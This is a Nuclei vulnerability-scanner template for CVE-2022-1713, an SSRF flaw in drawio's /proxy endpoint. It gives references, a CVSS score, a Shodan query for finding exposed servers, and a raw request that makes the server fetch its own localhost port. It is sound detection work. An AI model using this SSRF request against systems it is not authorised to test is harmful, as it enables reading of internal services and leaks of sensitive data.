nuclei-templates/cves/2022/CVE-2022-1713.yaml

40 lines
1.1 KiB
YAML

id: CVE-2022-1713
info:
name: Drawio - SSRF on /proxy endpoint
author: pikpikcu
severity: high
description: |
SSRF on /proxy in GitHub repository jgraph/drawio prior to 18.0.4. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.
reference:
- https://huntr.dev/bounties/cad3902f-3afb-4ed2-abd0-9f96a248de11
- https://nvd.nist.gov/vuln/detail/CVE-2022-1713
- https://github.com/jgraph/drawio/commit/283d41ec80ad410d68634245cf56114bc19331ee
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-1713
cwe-id: CWE-918
metadata:
shodan-query: http.title:"Flowchart Maker"
verified: "true"
tags: cve,cve2022,drawio,ssrf,oss
requests:
- raw:
- |
GET /proxy?url=http%3a//0:8080/ HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Flowchart Maker &amp; Online Diagram Software</title>"
- type: word
part: header
words:
- "application/octet-stream"